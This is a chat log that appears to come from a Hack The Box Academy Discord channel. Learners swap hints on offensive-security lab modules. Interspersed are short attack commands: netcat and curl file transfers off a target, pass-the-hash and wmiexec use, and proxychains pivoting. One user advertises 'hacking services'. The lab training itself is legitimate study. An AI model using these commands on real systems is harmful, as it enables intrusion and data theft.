#modules

1 messages ยท Page 76 of 1

hardy widget
#

HMU for any hacking services

small sage
#

Hi, I'm having trouble on the Password Attack module, last question of Pass the Hash section, I'm trying to get a reverse shell through Invoke-WMIExec, it's showing that the command is executing on the DC01 target, but I'm not getting any connection to my netcat listener, any tips?
I've tried both the 10.x.x.x IP and the 172.x.x.x IP, and a couple different shell commands from reverseshells

nevermind, just tried again and it worked, don't know what I did different kek

thorn urchin
heady nymph
#

Anyone able to help with Server Side Attacks - Skills Assessment?

heady nymph
#

nvm

bitter comet
#

probably not the place, but any ideas on how I could get a light mode to work on htb?

cunning prairie
bitter comet
#

I have an extension that bolds the beginning of words for reading, but it's sorta painful to use on light text

cunning prairie
gentle root
#

Pivoting ๐Ÿ˜ฆ

iron patio
#

Anybody know what tool to use to talk to an ibm-db2 service?

#

I'm on the nmap hard lab.

glacial hazel
#

honestly, this is better than the usual "how do I hack my ex's instagram"

glacial hazel
#

"how do I steal discord tokens" or something

#

lmao what was that

#

free cash

rustic sage
#

Hi everyone, I don't know if you could help me, I'm stuck with Windows Privilege Escalation Skills Assessment - Part I. I'm not able to connect to the target. I don't know what username and password to use since it doesn't appear in the section. I have done an nmap and I see the RDP port 3389 open. I have also done the nmap with --script rdp-ntlm-info, rdp-enum-encryption and rdp-vuln-ms12-020, I get more information but no users to connect via RDP. Could you give me a clue, please? Thank you so much!

rustic sage
# acoustic owl

Thanks @acoustic owl , but how can I leverage the command injection flaw without connecting via RDP? As I review the entire module, the only way was the connection through SQL and the port is not open and I do not have a user. I know I left something out but I've been backing it up for several days and I can't find other way!

rustic sage
#

Ok, thanks, I'll look for the 80, to see if I am able to find something

turbid lily
#

Command Injection modules might be useful too

grand bane
#

Hello guys can somebody help me with Exploiting Web Vulnerabilities in Thick-Client Applications I'm going to kill myself

turbid lily
empty fog
#

Hello, I'm currently at the module "PIVOTING, TUNNELING, AND PORT FORWARDING - RDP and SOCKS Tunneling with SocksOverRDP" and when I try to execute regsvr32.exe SocksOverRDP-Plugin.dll I get the following error. Please, how to solve this issue?

kind holly
#

can anyone help me to solve vhost fuzzing module ? I am totally frustated to solve this.

acoustic owl
#

The DLL is malicious and is detected and deleted by Defender

acoustic owl
acoustic owl
empty fog
coral mulch
#

hello

fathom mortar
#

hello guys, can someone help me out on the AD Enum & Attack module on section kerberoasting from linux?

fathom mortar
#

Got it. Thanks anyways ๐Ÿ™‚

broken warren
#

Not really a module question but was wondering if anyone uses removable storage with a VM? I want to save my notes for HTB on a portable SSD, but ive never mounted a device before. Im positive it IS connected to my VM but whenver i use fdisk -l i only get sda1, sda2, sda5.

river token
#

Password Attacks >> Password Mutations - Am I really supposed to take the time and brute force SSH with a password list with a count of over 94K ?

autumn pilot
#

try to narrow down the password list by simply using only words that start with the letter b/B

flint solar
#

hello, extremely new to HTB, coming from THM 2%, goals are OSCP or eCPPTv2 atm, been advised to do TJ Null's box's, how do i find them?

#

coming from a telecommunications background, so far i've acheived CCNA, eJPT, CEH and working on security+

acoustic owl
#
#

Otherwise just ask the search engine of your confidence

flint solar
#

thank you!

pine dagger
#

TJNull's list is my plan after I finish HTB modules... which I will get to if they** stop releasing more modules**.

half shell
#

May I know where is the "Dump Memory to File" in x64dbg? I am following materials, but it is hard to follow. Course material doesn't mark up where to click...

Unable to understand why HTB stuff doesn't instruct more clearly

M:Attacking Common Applications(Attacking Thick Client Applications)

pine dagger
half shell
#

Course material says "Let's export the newly discovered mapped item from memory to a dump file by right-clicking on the address and selecting Dump Memory to File."

but which address? where? Course material is so confusing....

acoustic owl
#

The next one...

pine dagger
#

I've read all of the CME module, and the Blind SQL injection module, and done most of labs in Blind SQL. So, hoping to have those two done by end of the week. And then do the reading for Deserialisation Attacks, and Abusing HTTP this weekend.

acoustic owl
#

The HTTP modules are really hard....
I'm stuck in HTTP Attacks right now. I am somehow too stupid for it ๐Ÿ™ˆ

pine dagger
#

Not looking promising for me then ๐Ÿ˜„

#

One of the problems with the higher tier modules, less people have done them. Google Fu is less useful ๐Ÿ˜ฆ

acoustic owl
#

The modules are also brand new. Of course, only a few people have done them

pine dagger
#

Not all of them surely?

acoustic owl
#

No, I mean there are not many people who have taken these modules so far

#

and one more module

#

It seems to be not yet published

#

@pine dagger , we'll never get through all the modules

#

HTB makes modules faster than I can learn.
I mean, yesterday I finished the module HTTPs/TLS Attacks and today two new modules are coming out

rare topaz
# acoustic owl Haha, they keep releasing more modules. We are never finished

oh yeah i want to know, if i finished a module under subscription, and they add more info to the module after the subscription, can i still access the module, or do i have to pay again to access it.

Since they claimed that if you finished a module during a subscription, it'd be as if you bought it.

So im just wondering if yall experienced this.

acoustic owl
#

Every module that you complete during your subscription is yours.
If the module is later updated, it still belongs to you and you get the new content for free.

rare topaz
#

oh shit, nice

#

still doing the free ones but eventually i'll get student plan

upper haven
safe falcon
#

Module:KERBEROS ATTACKS
Section:Unconstrained Delegation - Users
Hi, I need help in this section. I have followed all the steps as mentioned in the section, but the DCSync attack was not successful. Can I contact someone to show them the steps I have taken in detail? Thank you in advance.

acoustic owl
daring steeple
#

hi, im stuck on the module File Inclusion section skills assessment, i find the page ifl_***** . Or I manage to list /access.log but when I send my webshell all of a sudden the logs don't refresh so no result afterwards, a hint would be a great help! TY

acoustic owl
daring steeple
keen ridge
#

this worked! thanks

summer flame
#

Hi, can anyone help me on "SQLmap - Bypassing Web Application Protections" module? for case 9 and 11..

ashen fog
#

Need some hints on Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.
for assessment 2 on AD enum and attack, i found the password dumping the lsa, but i cant seem to get the username for that password
I have System Shell on SQL01 and can execute mimikatz

spiral pelican
#

Hi all
Module : Active Directory Enum & Attacks
Section : Skill Assessment 2
I am blocked on the question 4 " Use a common method to obtain weak credentials for another user.
Submit the username for the user whose credentials you obtain."
I guess the password (Wxxxxxxx) and confirme it with the next question, but impossible to find the user.
I tried all the technique explain in password spraying from linux but nothing work (cme or custom script).
I used the worldlist provide in the linux attack host /opt/jsmith.txt and several other lists present
on the host..
I am blocked on this modules since several days. if some one can help me it will be very appreciated.
Have a good day all ๐Ÿ™‚

spiral pelican
#

i used classical crackmapexec cmd most

ashen fog
#

U can xfreerdp into ms01

#

with AB####

#

And then use DomainPasswordSpray

#

Internal Password Spraying - from Windows:

spiral pelican
#

tks i will try it immediatly

#

thanks for the tips

ashen fog
#

Did it work

marsh flicker
#

Hello, Noob question here. I am at module "Information Gathering - Web Edition" at the Vhosts section. I use my own Parrot linux VM locally. I start the target system, after that I download the ovpn file and start my vpn connection using that file. I assumed the target system is a name server as I can use dig pointing to this target IP. However I do not seem to find how to get to the vhost machine. In one attempt I even tried the target system to execute "curl -s http://<target IP> -H "Host: www.inlanefreight.htb", to no avail. What am I missing here.

glacial hazel
#

you need to add the entry to etc hosts

#

gottem

#

I was first

#

@odd notch you thought

odd notch
#

Hi where is the word list suggestd in the smpt section in the footprinting module.

rose plover
#

Hey I need some help on the Meterpreter module in Academy. I am supposed to exploit the msf module iis_webdav_upload_asp on port 80 however the Microsoft IIS httpd 10.0 service is running on port 5000 and can't be accessed with the exploit. I don't see a way of fixing it

glacial hazel
spiral pelican
rose plover
#

Already did

glacial hazel
#

rip

rose plover
#

Isn't really something on my end idk how to get past it

#

Also can't reach support on Academy the messaging doesn't work

glacial hazel
#

You could try looking up exploits for it online and use those

#

or in searchsploit

#

Is it a certain CVE youโ€™re exploiting?

fathom pendant
naive field
#

respect for yall helping in this channel literally 24/7

#

โ™ฅ๏ธ

glacial hazel
odd notch
#

the list that is

#

not the button

rose plover
glacial hazel
#

Sometimes the write ups donโ€™t work

fathom pendant
glacial hazel
#

I would probably suggest starting over and doing it again and if it still doesnโ€™t work then maybe try searching for a different exploit

marsh flicker
fathom pendant
odd notch
fathom pendant
#

Read the section carefully

#

There is an enum it talks about

grim matrix
#

In the Kerberos Attacks module Skills Assessment, is there a way to get DA and/or a shell on the DC? I got the flag but not a shell/login.

rose plover
glacial hazel
fathom pendant
rose plover
#

39 and 414

fathom pendant
#

Names

rose plover
fathom pendant
#

Numbers don't mean shit to me

rose plover
#

It is literally called Meterpreter lmao

glacial hazel
odd notch
#

I have the list

fathom pendant
odd notch
#

ok... still no tool tho ๐Ÿ˜ฆ

#

I mean I found a username || root || but is not the answer obv

fathom pendant
#

Smtp-user-enum

odd notch
#

where did you see it in the section? just as a sanity check for me

fathom pendant
#

Ctrl+f "smtp-" in your browser lol

#

Or "enum"

odd notch
#

don't see it in the section sorry

fathom pendant
#

Give me a sec to check notes. I don't recall if I was told about the tool or it was mentioned

odd notch
#

oh...

#

So I'm not insane

#

cool

#

witch,

zinc marsh
#

someone who completed password attacks

#

am just missing the linux hunt section but im not able do find it

marsh flicker
fathom pendant
odd notch
#

huh

#

it's not the the footprinting module

fathom pendant
#

Attacking common services

#

Yeah

glacial hazel
fathom pendant
#

So it's not mentioned in footprinting

autumn pilot
#

and a few tools mentioned as well on how to get the credentials

odd notch
#

intersting

fathom pendant
#

Is there another way that people are meant to enum SMTP in footprinting @autumn pilot or is it the list is small and manual is fine

autumn pilot
#

if I can recall correctly, you can use the metasploit module with the default list to do that

fathom pendant
#

Oh yeah there is a msf module

#

I completely forgot

odd notch
#

nope not there yet

scenic plover
rose plover
#

yes

naive field
#

hey guys im doing pass the ticket linux and when i use keytabextract.py on svc_workstations.kt i dont get ntlm hash which i am supposed to crack, is it supposed to be like this?

scenic plover
fathom pendant
rose plover
fathom pendant
#

Is it 5000, or 50,000

rose plover
#

5000

scenic plover
#

You don't get a login page?

fathom pendant
#

On shitty mobile so the screenshot doesn't load for me of their enumeration

rose plover
#

I tried manually going on the web to port 5000 to the address and it says it is too long to load or something

#

no

fathom pendant
#

Try resetting your VPN connection then

rose plover
#

That wouldn't matter

#

Done that multiple times

#

Machine resets

scenic plover
#

That's the issue. You're attacking the right port but you need to see that service. Following along in this example isn't exactly right. You're on the right track but you need to know that service in order to be successful. Might want to hit it from the attack box that the platform provides

rose plover
#

Yah I'll go try that

#

Many times pwnbox is the only thing that works

scenic plover
rose plover
#

Oh brother I do that all too often XD

#

Thanks for the help

odd notch
#

Test test

scenic plover
#

No problem. Good luck and hopefully you get a smooth run after this. Pepe_salute

odd notch
#

Huh discord hang for a sec

rose plover
#

Soooooo found a different exploit and don't think you were supposed to go the way I just found cause I found NT Authority lmao

rose plover
#

Yup lmao

#

Thx

scenic plover
#

No problem. Stuff can be frustrating, but just keep trucking and don't be afraid to boot up the attack machine to see if you get different results. Don't forget we are technically "researchers" so explore as much as you can when it comes to labs and modules. The more you practice the better you'll be in a practical situation.

rose plover
#

Thanks for the pep talk XD It is always good to just take a break then come back to it

fathom pendant
odd notch
#

I see

#

Well today is over but I'm kinda sad i didn't complete at least a section today

marsh flicker
glacial hazel
#

Np

fathom pendant
naive field
#

hey might be a dumb question, but how do i get file content through smbclient?

compact patrolBOT
naive field
#

what

compact patrolBOT
fathom pendant
#

Bot got borked

compact patrolBOT
naive field
compact patrolBOT
naive field
compact patrolBOT
# naive field

Automatic verification failed. Please contact support.

naive field
#

what cmd can i use to retreive the julo.txt?

compact patrolBOT
fathom pendant
compact patrolBOT
fathom pendant
#

Also don't mind the bot he's a little durnk

compact patrolBOT
scenic plover
# naive field

Ditch the -c option because it's connecting, running the command you're specifying and then dropping the connection after output.

compact patrolBOT
acoustic owl
#

Who crashed the bot? ๐Ÿคช

compact patrolBOT
dim hound
#

hahaahh ๐Ÿ˜‚

compact patrolBOT
dim hound
#

With every message it seems to do react with the bot

compact patrolBOT
compact patrolBOT
fathom pendant
compact patrolBOT
zinc marsh
#

please someone who can help me in password attacks module - sectio: linux hunting

summer prism
#

Fooprinting Skill Assessment - Medium

Enumerate the server carefully and find the username "HTB" and its password. Then, submit this user's password as the answer.

I've found the credentials for the "other" account, i'm unable to login in SQL Management Server

fathom pendant
#

You can also try using the CMD line instead

summer prism
#

Worked, Thankyou

naive field
#

how can i transfer my keytab from ssh to my local?

#

i tried opening python http server on ssh

#

and wget from my machine

#

but its not working for sm reason

scenic plover
# naive field i tried opening python http server on ssh

In some cases making an HTTP connection is not allowed on systems from the outside to in. You'll need to find a way to upload to your machine because calls out to your own machine should be more lenient. In some cases an upload might not be necessary. Definitely go back to the file transfer module and look over it. This is a must if you plan to get into pentesting, because you need to be able to adapt for exfil. If you don't want to go review the module this link might be of some use https://book.hacktricks.xyz/generic-methodologies-and-resources/exfiltration.

compact patrolBOT
naive field
#

i tried using python uploadserver but its also not working

fathom pendant
#

perhaps smb

#

or other methods

glacial hazel
#

Download a file from the target machine to your local host?

glacial hazel
fathom pendant
#

that's probably the most convoluted way

glacial hazel
#

Not at all

fathom pendant
#

from target machine though you can run the python http server and use wget on your local machine to grab it

glacial hazel
#

Or you could use netcat ๐Ÿ˜›

fathom pendant
#

so in your ssh session on the target machine you ran the python http server

#

not on your pwnbox/vm

naive field
#

yup

#

it cant connect

#

๐Ÿคทโ€โ™‚๏ธ

fathom pendant
#

interesting

#

i never had issues with it

#

what module is this related to?

glacial hazel
#

Would you like to try the method I suggested

naive field
naive field
fathom pendant
#

follow the instructions

glacial hazel
#

Yes

fathom pendant
#

in that section

#

iirc there was no need to download anything

#

or I just copy/pasted

#

either way

naive field
fathom pendant
#

OH

#

OHHHH

#

yeah

#

no

#

you don't need to download that file AT ALL

naive field
#

huh

fathom pendant
#

the export command

#

sets an environment variable

naive field
#

yeah but it says down in the note

#

i need to transsfer

fathom pendant
#

hold on

#

let me double check my notes

glacial hazel
naive field
#

im trying netcat rn

glacial hazel
#

Do you want me to guide you through it ๐Ÿ˜›

fathom pendant
#

ok

#

now I remember

#

I was able to upload from the connected host

#

i used the syntax: curl -T <filename> <myserver>

#

-T is for post request

naive field
glacial hazel
#

Youโ€™re probably not doing it correctly

#

Would you like me to guide you through how to do it

naive field
naive field
#

holy tits im on this file transfer problem for like 2hr

#

๐Ÿ’€

fathom pendant
#

i'd suggest going over the file transfer part again

naive field
#

im going all over my notes

#

but nothing is working

#

i ususally just make python http server

#

and its always chill

glacial hazel
#

On your local host: nc -l <port> > <file name>

fathom pendant
naive field
#

i tried that

#

it was not working

#

it crashed everytime

#

idk why

#

it would ping my server on local machine

#

but never send the file

#

@glacial hazel

#

this good?

glacial hazel
#

Umm

#

Why does it look like that lol

naive field
#

its two terminals

glacial hazel
#

What command did you type on your local host

fathom pendant
#

oh

#

I see the issue

#

they used the -l flag

#

on their local host

#

doesn't -l indicate that you are listening on that port

glacial hazel
#

yes

#

and then the > redirects received bytes to the file

fathom pendant
#

yes

#

but they are already listening on the target machine

#

which is the problem :)

#

they aren't actually connecting

#

they are just setting up listeners xD

naive field
#

i tried connecting

glacial hazel
#

@naive field what command did you type on your local host

naive field
#

which ip should i use the machines 10.129.x... or the 172.1.6.15

naive field
#

u see

#

but not working

glacial hazel
#

On the host with the file: nc -w 2 <your ip> <port> < <file to transfer>

fathom pendant
#
$ nc -l 1234 > filename.out

Using a second machine, connect to the listening nc process, feeding it the file which is to be transferred:

$ nc host.example.com 1234 < filename.in
naive field
#

let me try

#

my brain is fied

#

friedd

naive field
#

or the attack?

glacial hazel
#

omg

#

I told you how to do it lol

fathom pendant
#

reading comprehension will tell you

naive field
#

i did it

#

its not working

#

it says connectino refused

glacial hazel
#

Send the command youโ€™re using

naive field
#

let me try again with diff ip

glacial hazel
fathom pendant
#

since the second paragraph starts with "using a second machine"

naive field
#

im sry im just in my class and trynna do this so its like doing 50 things at once

fathom pendant
#

also comprehending "filename.out"

fathom pendant
naive field
#

wifi at home

#

:D

#

since im and exch student in usa

fathom pendant
#

then that sucks to suck then brother. If you have a phone you can see if your provider offers tethering services

naive field
#

i got no bag for internet rn

#

i got hotspot

#

but its 20gb /month

#

so it goes out pretty fast xd

fathom pendant
#

you really shouldn't be using that much if you're JUST doing academy content on the hotspot

naive field
#

yeah but i use pwn box

fathom pendant
#

but YouTube and streaming platforms

naive field
#

so the pwnbox uses additional wifi

fathom pendant
#

not really how that works cheif

naive field
#

yeah prob

#

but it still eats my internet ngl haha

#

and sometimes i wanna wathc something on laptop so yeah...

fathom pendant
#

like yes it does use additional data; but not enough to be shooting it through

naive field
#

i watch one episode on netflix

#

its alr almost 2gb gone

fathom pendant
#

yeah

naive field
#

and i play music on yt while im doing htb

fathom pendant
#

Video streaming is going to be the roughest

naive field
#

yeah its fucked

#

but i gotta hustle through this

#

i got 3 more weeks in usa

#

cant let this stop me from grinding

fathom pendant
#

you can't do this when you are back home?

naive field
#

i can

#

but i do not want to waste time

#

im planing on doing cpts bu the end of june

glacial hazel
halcyon pond
#

i didnt see this yesterday but ty nonetheless

fathom pendant
#

then not much we can do to help

#

you can see if your school is willing to let you stay longer

#

because of your home situation not having internet

naive field
#

i do stay longer

#

i finish in like 10min

#

ill come back

#

i do my shit in library when i finish school

fathom pendant
#

but also when you put a time constraint on yourself you only end up stressing yourself out more ยฏ_(ใƒ„)_/ยฏ

naive field
#

thats true

fathom pendant
#

like it's good to have a goal time

#

but you said end of june? that's still a month and a half away

#

that's PLENTY of time

naive field
#

yeah but i am not sure if i can get ready for cpts by that time

fathom pendant
#

and that's ok

#

ยฏ_(ใƒ„)_/ยฏ

#

it doesn't reflect negatively on you that you aren't ready by your own arbitrary deadline

naive field
#

but i feel the part after ad will gro pretty fast

#

since i do bbh

fathom pendant
#

as long as you are learning

#

that's the important thing

naive field
#

but my AD knowledge etc.. not good.

naive field
#

i m justr trynna get a job as soon as possible

#

thats why im trynna stay on grind as much as i can

fathom pendant
#

cpts and cbbh aren't guaranteed to get you a job

naive field
#

oh ofc

#

i know

fathom pendant
#

hell most certs don't guarantee a job

naive field
#

but it will def help me

#

with knowledge and resume

fathom pendant
#

if you're actually looking for a job, you're better off getting OSCP

naive field
#

yeah i did want to

fathom pendant
#

as that's industry recognized

naive field
#

but hell i got no money even close to 2500$ lol

fathom pendant
#

CPTS isn't as industry recognized yet

halcyon pond
#

i was gonna ask if the oscp was one pof the certs that get a job cuz thats what im going for

#

oscp is $1500

fathom pendant
#

OSCP opens the door; CPTS actually helps you nail the interview

naive field
halcyon pond
#

whats in the cpts that isnt covered by the OSCP if u know?

naive field
#

still too much for me haha

halcyon pond
#

lmao fair

naive field
fathom pendant
#

it's mostly all the same from the OSCP syllabus

#

but we are starting to stray from topic here

naive field
#

except u cant use any automation tools in oscp

#

(the ones u didnt write )

#

like linpeas etc...

halcyon pond
#

u can use linpeas 90 percent sure lol

#

lemme doublecheck

naive field
#

i know one guy got f-ed

#

bcs he used linpeas

#

so im not sure how it is now

halcyon pond
#

really crazy i feel like i researched it

naive field
#

yeh it was pretty famous

#

"scandal" hahahaah

#

since that guy was a big head in cybersec

halcyon pond
#

ah they have one auto exploit in linpeas thats y

#

u can use auto enum on oscp fine tho i think

glacial hazel
fathom pendant
naive field
#

ik first he didnt pass

naive field
#

ok im back

#

imma do this now ๐Ÿ™

wraith delta
#

Whats the toughest module

fathom pendant
#

idk then man

scenic plover
# naive field ๐Ÿ˜ญ

Here's something I like to do. Sometimes the more simple the better. Cat out the file and pipe that into base64 encoding. Then copy paste into a file. Afterwards base64 decode and redirect into a new file. MD5sum for sanity check

naive field
#

but thanks yall <3

fathom pendant
naive field
fathom pendant
naive field
#

since i was like shit i gotta see where its the poblem

dim hound
#

https://academy.hackthebox.com/achievement/531355/25 @acoustic owl Thanks for the nudge ; )

scenic plover
#

Also think about it in terms of detection. The less you do and the less connections you make into the network the less noise you make. I definitely encourage you to explore, but sometimes getting fancy isn't worth it. Real adversaries want quick in and out as cleanly as possible.

glacial hazel
inland raft
#

hi

#

lol

naive field
#

but now i got hella other problems lmaoo

#

this password attack module really drained tf out of me

glacial hazel
rustic sage
#

I have been struggling for a while to get any information off the ftp server for the footprinting easy lab and need a nudge. I am stuck witht the "229 Entering Extended Passive Mode (|||3945|)
150 Opening ASCII mode data connection for file list
226 Transfer complete" message and I am not sure how to move ahead

naive field
#

okay i restarted the machine

#

retired everything and its not working

#

i get this when i try to run proxychains

#

i started chisel server and connected to it through rdp

#

just as it said in the module

#

i feel like an a-hole asking this much in this channel

#

...

heady tusk
# naive field

looks like your tunnel is broken. feel free to dm me if you need another pair of eyes for debugging

grim matrix
#

(I maybe should have quoted that question a different way... hope it makes sense)

acoustic owl
rustic sage
arctic steppe
#

Just FYI; for the unix name (uname) portion of the Introduction To Academy/Interactive Section with Terminal, there is no longer a 'parrot' anywhere in the string:

Linux htb-b60zrcs6kk 6.1.0-0.deb11.5-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.12-1~bpo11+1 (2023-03-05) x86_64 GNU/Linux

dim hound
arctic steppe
#

Thanks @fathom pendant

dim hound
pliant wolf
#

hey guys am stuck at Firewall and IDS/IPS Evasion - Hard Lab

i tried to run different scans

#

umm is there any tip

#

getting port 22 and 80, services are visible.

heady tusk
#

there are more ports for you to find. try to find another nice trick to circumvent the firewall

pliant wolf
#

okay

#

thanks

#

there are several scans which I think I should run but they may consume soo much time ๐Ÿ˜ฆ

#

am not sure if I am in the right track

heady tusk
#

dm me then

dapper fable
#

ok im out of ideas w/ Hacking Wordpress, Directory Indexing - i used wget to mirror the entire tree of the listable directory and didnt find a flag in there

#

or is there another listable directory not in that hierarchy

#

ugh nevermind, its not given in the structure section, but its mentioned in subsequent sections

half anchor
#

hello everyone

#

am new to the server

#

How's everyone

thorn urchin
thorn urchin
#

doesnt matter

flint sparrow
polar widget
#

Anyone working on windows attack and defense module?

polar widget
#

Well

#

Thanks for putting in efforts

thorn urchin
#

np

polar widget
#

Well how do I connect to DC1 using the given creds

thorn urchin
#

which section

#

and which question

polar widget
#

Any of its sections,
I just began with DCSync

#

Bounced back to 2nd section to see details of any guide on connection to DC1

thorn urchin
#

so by connect are you asking about getting shell?

#

after already having domain creds?

polar widget
#

Like RDP, because I have to see event logs

#

It's in a different network, can't access it directly

thorn urchin
#

if its one you're meant to see event logs it should have specific instructions for you

#

otherwise you could pivot and run rdp via proxychains

#

but I dont think theres any segment that actually requires doing that

polar widget
#

Yeah
And there's no clear instructions on how to actually connect to DC1

thorn urchin
#

if its just shell run through the usual psexec/smbexec/winrm/wmiexec, ect

polar widget
#

In every single assessment in each section carrying cubes, it states connecting to DC1

safe falcon
thorn urchin
#

what specifically are you trying to do in which section

polar widget
#

I tried switching to user accounts as well, but to my surprise there wasn't an option even lmao

thorn urchin
#

?

#

youre probably on a section where you're not expected to rdp

polar widget
safe falcon
#

i have done this module press Win+R ,type mstsc and use the creds for DC1

thorn urchin
#

ah here I was thinking you meant this was the AD attacks and enumeration module

polar widget
thorn urchin
#

idk for that specific one

frigid osprey
#

Hey Everyone! I am currently working on the File Upload Attacks - Skills Assessment section:

Stuck and need a nudge. I fuzzed the directories and found all the interesting PHP files. I read through the material and tried to use a method in the other section to read the contents of PHP files (I got it to work in the exercises by viewing the source of the page). So trying the same technique, it looks like my file is uploading (with a bypass technique), but I am not getting a B64 dump of any of the PHP files I try to read (I tried them all just as a sanity check). Please drop me a nudge in the right direction so that I can read the PHP file I discovered. Thanks, everyone.

glacial hazel
#

Are there any other ports open

#

Usually mysql isnโ€™t exposed externally

#

So you may need to abuse another attack vector to get access to the machine to get access to mysql

misty cedar
#

the only port I know for Mysql is 3306, i didn't think there were other ports because thats what the module told me.

brazen hinge
#

Hello, has someone solved BROKEN AUTHENTICATION - Brute Forcing Cookies (Log in to the target application and tamper the rememberme token to give yourself super user privileges. After escalating privileges, submit the flag as your answer.)? I am stuck in decoding cookie, i have recognized the ||URL encoding and base64||, if i convert the result ||to HEX i can see the magic bytes 78 9C but i can't unzip using gunzip||.

honest ridge
#

When using socks in metaspoilt after setting preferences then i run it, it starts then automatically stops straight away. any ideas? also cant see anything remaining in jobs.

rustic sage
#

In the footprinting medium lab, am I supposed to be able to login with the account found from the file you can mount?

glossy mist
#

Hey so, I can't shut down this seasonal box? Are we not able to until the time expires? I've just been doing this box for 10 hours straight, and need a break.

rustic sage
#

login to smb

#

because the service I need to get onto keeps crashing

glossy mist
#

Nvm, ๐Ÿ˜†

misty cedar
#

The answer of what service is kinda in your nmap scan. use acronyms.

red current
#

I'm in Using Web Proxies and the Proxying Tools section. Every IP address I try just gives a message at the end saying "Connection: close" and that's not the answer to the question in this section. Anyone else run into this?

brazen hinge
fathom pendant
naive field
#

getting this

#

:/

fathom pendant
#

Is your proxychains.conf correct

naive field
#

i just edited that and added this socks5 at the end

zinc marsh
#

someone who completed password attacks

#

am trying to type the files wit h mimikatz but im not being able

zinc marsh
#

passthehash

naive field
zinc marsh
#

cool the new insignia for the seasonal machines

fathom pendant
fathom pendant
#

I think I had a similar issue like that

#

Idk why it's an issue

naive field
#

issue thanks a lot

#

oh shit nope

#

i thouht it connected ๐Ÿคฃ

#

now im getting linux socket error or timeout

#

before there was none of that

fathom pendant
#

I think you need more for the wmiexec issue because I believe it's expecting an IP not a cname

#

Linux01 is a domain (usually -d )

#

But idk wmiexec enough

naive field
#

It said in module this

#

"To use the Kerberos ticket, we need to specify our target machine name (not the IP address) and use the option -k."

#

:{

fathom pendant
#

Does it give that as example?

naive field
fathom pendant
#

Interesting

naive field
#

hahaha

#

stuck on this part

fathom pendant
#

good luck ยฏ_(ใƒ„)_/ยฏ

naive field
#

and i cant get the last question xd

naive field
#

thanks a lot for helping

#

for real

#

i see u all the time here in chat i rly appreciate it

fathom pendant
#

I'm not home to sanity check lol

#

And thanks I try lol

naive field
#

i recon no but ahha

fathom pendant
#

Lol no

naive field
#

was just interested since ur really helping here all the time :D

mellow cairn
#

Anyone have advice on this Active Infrastruction Identification question

red current
#

Has anyone gotten past the Proxying Tools section in Using Web Proxies? I've gone through the steps to set everything up right and I even get a line in HTTP history that says robots.txt. However, the only response I ever get at the end of the request, no matter what web site I use, is Connection: close. Does anyone know how to get the answer for this section? The hint says it starts with 'msf'.

quick cloud
#

I'm stuck on shells and payloads - bind shells. SSH is not working I been trying for 30 mins. And if it does work it doesn't let me type. I feel like I can beat it in 2 mins if ssh would work

red current
red current
thorn urchin
#

not the channel for this at all. module discussion only. Read #rules and #welcome

quick cloud
#

Yes the second

red current
quick cloud
#

Yes I want to use that manual bash shell but I can't SSH into the target

#

It's not letting me

#

Or rather it's taking a very long time

red current
#

That command is how you ssh to the target. And don't forget your listener. Also, ls -la is your friend.

quick cloud
#

Now I'm confused the command is how you SSH into the target?

red current
#

Oh, wait. Never mind. You do have to ssh to the target first. Try restarting the session.

quick cloud
#

Yeah I did 5 times now Im waiting for response from support rn

red current
#

I had no problem getting in. Are you sure you're doing $ ssh htb-student@Ip-Address and then putting in the password?

quick cloud
#

Yes

red current
quick cloud
#

Tried vm first then switched to pwnbox

fossil crescent
#

Anyone avail for a nudge on the skills assessment for HTTP ATTACKS? I believe I (a) understand the hint [based on doing some testing], (b) believe I've got all the value-lengths fixed... BUT... still getting the WAF error, which suggests even though it should be bypassing the WAF, that it's not... but in my enumeration, I don't see any other means possible to do it... totally lost/frustrated at this point.

EDIT: Realized error of my ways wrt the WAF, email request SEEMS to go thru (based on return values), but NO email... ๐Ÿ˜ญ

EDIT2: SOLVED!!! Solution was something I swear I had (unsuccessfully) tried before, but suspect did it slightly wrong before + exhaustion -- with a clear head, quickly knocked it out.

red current
quick cloud
#

@red current thanks! Had to restart my PC not sure what was going on.

#

After restart got the flag

gentle root
#

So I'm looking at the first part of the pivoting module with Dynamic Port forwaridng with ssh and socks tunneling -- Which command do I need to actually do in the lab? I'm doing ssh -D 9050 ubuntu@10.129.202.64 but when I nmap with proxychains nmap -v -sn 172.16.5.1-200 to nmap the internal network I get a no route to host?

red current
gentle root
#

Oh it's because the no route to host was for the other ports on other services. I see, I was able to scan it with a dynamic port forward

naive field
#

is anyone available to help me with password attack pass the ticket linux? im on the last question stuck all day

#

thanks!

orchid ingot
#

Would like to see if the username and password are clickable. I mean, just click and copy, just as IP address do.

rustic sage
#

If I wish to start a capture without hostname resolution, verbose output, showing contents in ASCII and hex, and grab the first 100 packets; what are the switches used? please answer in the order the switches are asked for in the question.

#

help me

#

I know the answer but it shows up as incorrect lol

#

the command would be sudo tcpdump -nvXc 100 in order as indicated in the question but I can't find the answer if it is correct.

#

or sudo tcpdump -nvvXc 100

#

In the order indicated but does not appear as valid

autumn pilot
#

only the paramaters

#

** what are the switches used? please answer in the order the switches are asked for in the question.
**

rustic sage
#

Hello somebody can help me with WEB SERVICE & API ATTACKS module

rustic sage
# orchid ingot <:prayge:867733100925550592>

@autumn pilotThe order according to the question is sudo tcpdump -nvXc100
-n Do not convert addresses (i.e. host addresses, port numbers, etc.) to names.

-v: When parsing and printing, produce (slightly more) detailed results. For example, the time-to-live, ID, total length and options in an IP packet are printed. It also enables additional packet integrity checks, such as IP and ICMP header checksum verification.
When writing to a file with the -w option and at the same time not reading from a file with the -r option, report to stderr, once per second, the number of packets captured. On Solaris, FreeBSD, and possibly other operating systems, this periodic update may actually cause the loss of captured packets on their way from the kernel to tcpdump.

-X:
When parsing and printing, in addition to printing the headers of each packet, print each packet's data (minus its link-level header) in hexadecimal and ASCII. This is very useful for parsing new protocols. In the current implementation, this flag can have the same effect as -XX if the packet is truncated.

-c:
Exit after receiving count packets.

#

im in skills assesment and i dont know how to solve it

autumn pilot
rustic sage
#

the switches are --> -nvXc 100

#

-nvXc 100 thanks @autumn pilot crack

#

can somebody help me with Web Service & API Attacks - Skills Assessment module please?

rustic sage
#

when i put the sqli payload with some characters doesnt work

#

File "/home/ivan/Desktop/pocsoap2.py", line 3
